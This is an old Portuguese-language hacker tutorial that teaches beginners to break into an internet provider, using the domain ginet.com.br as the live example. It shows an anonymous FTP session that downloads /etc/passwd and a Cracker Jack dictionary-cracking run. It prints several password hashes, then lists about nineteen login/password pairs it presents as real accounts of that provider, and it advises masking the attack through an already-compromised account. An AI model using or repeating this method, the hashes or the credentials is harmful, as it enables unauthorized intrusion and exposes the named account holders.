HACKEANDO PROVEDORES

Este é um metodo simples pra hackear provedores NOVOS, nao esqueca do detalhe os admins tem que ser muito bestas pra levarem essa. Essa e' pra comecar mesmo... por isso nome do metodo e'ME-TODO LAMER.

INGREDIENTES:

1- Programa pra utilizar o FTP, um pequeno é o FTP (Localizado no seu diretório do windows)

2- Pouco conhecimento...
( e' soh seguir estes passos )

3- Paciencia
( coloque uma musica Hare Krishna )

4- Desencriptador ( jack pra dos ou crack41 pra linux)
( por ai... )

5- Uma wordlist pequena ( algo bem feitinho )
( pretendemos colocar uma worlist boa na nossa pagina mas por enquanto vc usa a sua )

6- Um sysadmin burro!
( facil de achar... )

7- Meia hora a sua disposicao
( bah! )

Bom, vamos pegar o exemplo de um provedor onde os administradores devem ser muito burros. Ou querem levar mesmo... O dominio escolhido é ginet.com.br Escolhemos este a pedido de um amigo. Vamos-lah! Qualquer crianca pode fazer!

Letz ZtarT =++-

Essa e' a sessao de FTP realizada... Observe abaixo que nos logamos como "anonymous" e colocamos como passwd um mail comum, pode ser "silviosantos@sbt.com.br". Nao coloque coisas muito louca como passwd que o operador pode desconfiar. Saiba que seu IP esta sendo logado entao o legal mesmo seria ja estar utilizando uma conta hackeada.

C:\HACKING\ftphack>ftp

ftp> open ginet.com.br
Connected to ginet.com.br.
220 pingo FTP server (UNIX(r) System V Release 4.0)
ready.
User (ginet.com.br:(none)): anonymous
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -la
200 PORT command successful.
150 ASCII data connection for /bin/ls (200.???.???.??,2475)
(0 bytes).
total 14
drwxr-xr-x 6 0 1 512 Nov 15 20:50 .
drwxr-xr-x 6 0 1 512 Nov 15 20:50 ..
lrwxrwxrwx 1 0 1 7 Nov 15 20:50 bin ->
usr/bin
dr-xr-xr-x 2 0 1 512 Nov 15 20:50 dev
dr-xr-xr-x 2 0 1 512 Nov 15 20:50 etc
drwxrwxrwx 7 30000 1 512 Jan 8 19:19 pub
drwxr-xr-x 5 0 1 512 Nov 15 20:50 usr
226 ASCII Transfer complete.
431 bytes received in 0.60 seconds (0.72 Kbytes/sec)
ftp>
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (200.???.???.??,2476)
(0 bytes).
group
netconfig
passwd
226 ASCII Transfer complete.
26 bytes received in 0.00 seconds (26000.00 Kbytes/sec)
ftp>
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (200.???.???.??,2477)
(62 bytes).
226 ASCII Transfer complete.
63 bytes received in 0.06 seconds (1.05 Kbytes/sec)
ftp>

Bom! Ai ta o passwd, em alguns casos o shadow que contem as senhas encriptadas. Esse é o provedor onde os caras sao do tipo... burros demais!

Agora que temos o arquivo com as senhas o que devemos fazer? Vamos desencriptalas. Usem o crackerjack se vcs estiverem rodando  em ambiente DOS, lembrem-se o cjack nao roda ao mesmo tempo que o ruindows95, entao inicie o prompt em modo de seguranca.
Pronto, vou colocar uma sessao de crack nas senhas aqui abaixo.

Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright (C) 1993, The Jackal, Denmark

PWfile(s) : c:\raiz\contas\ginet\passwd
Wordfile : c:\hacking\diction.ary\axur
Initializing session data...
Loaded 52 total accounts with 50 different salts.

Cracking... (Hit any key for status, Ctrl-C to abort)

forest (forest)
pinara (9871)

Depois de exaustivo tempo larguei de mao, porra minha worlist menor tem 3 megas e nunca pegou tao poucas senhas assim, eu uso esta lista com palavras do dicionario quando quero economizar tempo ;) pq uma lista gerada bem fica com no minino 600 megas.
Qual a primeira providencia que eu vou tomar?
Vou renomear o arquivo passwd e depois limpar ele, usando os proprios logins como palavras pra wordlist.

gampert
regis
pinara
rodinei
patricia
marcelo
marcos
fernando::9809::::::
debora:wu6RAjzsZPVmI:9810::::::
fredi:AOIaiY4qoNnjs:9818::::::
bstudio:I3ge9NrA610ck:9818::::::
bbborges:L2bpLO7gP7o7U:9818:::::
setup --DEIXAR SOH O LOGIN--
:HB90Lijk05mpE:6445::::::

Vc soh deve deixar a primeira parte como eu fiz no exemplo acima. Ai entao nos vamos tentar novamente crackear o arquivo passwd soh que entendendo que os usuarios usam o login e a senha iguais. Hehehe.. bingo!
Vou listar abaixo as senhas que eu peguei usando o metodo de

login=senha

Provedor: ginet.com.br
login - senha
- - - - - -
bstudio - bstudio
oab_pf - oab_pf
nuhry - nuhry
jtelles - jtelles
demo1 - demo1
demo2 - demo2
demo3 - demo3
demo4 - demo4
demo5 - demo5
cmoura - cmoura
glaucia - glaucia
pedroso - pedroso
cotrijal - cotrijal
ameplan - ameplan
guto - guto
jmartins - jmartins
lguedes - lguedes
coopibt - coopibt
jferst - jferst

Coisa estupida ne'? Os caras usam quase todas as senhas e logins iguais.  Agora e' soh vcs fazerem isso, mas lembrem-se e'muito dificil
de achar um provedor estupido assim. ;)

by [-King-]